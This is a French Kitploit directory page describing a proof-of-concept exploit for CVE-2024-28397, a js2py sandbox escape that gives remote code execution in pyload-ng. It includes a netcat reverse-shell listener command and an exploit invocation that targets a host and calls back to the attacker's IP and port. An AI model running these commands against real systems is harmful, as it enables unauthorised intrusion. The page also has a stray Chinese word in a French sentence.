Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py- — Exploit PoC pour CVE-2024-28397 – Exécution de code à distance dans pyload-ng via évasion du sandbox js2py | Kitploit
Outils/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
Analyse des VulnérabilitésExploitationExploitation d'Applications Web
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

Exploit PoC pour CVE-2024-28397 – Exécution de code à distance dans pyload-ng via évasion du sandbox js2py

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 1 moisPas encore vérifié

Exécution de code à distance – CVE-2024-28397 (pyload-ng / js2py)

Ce dépôt contient un exploit de preuve de概念 (PoC) pour CVE-2024-28397, une vulnérabilité d'exécution de code à distance affectant pyload-ng en raison d'une utilisation non sécurisée de js2py.

Avertissement:
Ce PoC est uniquement destiné à des fins éducatives et de recherche.
Ne l'utilisez pas sur des systèmes qui ne vous appartiennent pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
L'auteur n'est pas responsable de toute utilisation abusive de ce code.


Détails de la vulnérabilité

  • Identifiant CVE: CVE-2024-28397
  • Composant: js2py dans pyload-ng
  • Impact: Exécution de code à distance (RCE)
  • Vecteur d'attaque: Une charge utile JS malveillante s'échappe du sandbox js2py et exécute des commandes système arbitraires.

Prérequis et configuration

Vous aurez besoin de Python 3.x, de la bibliothèque requests et de netcat pour récupérer le reverse shell.

  • Cible → Instance pyload-ng vulnérable avec l'endpoint /run_code accessible

Écouteur → À démarrer avant de lancer l'exploit:

nc -lvnp 4444

Utilisation:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

Exemple de sortie:

  • [+] Register successful!
  • [+] Login successful
  • [+] exploit worked
Télécharger l’outil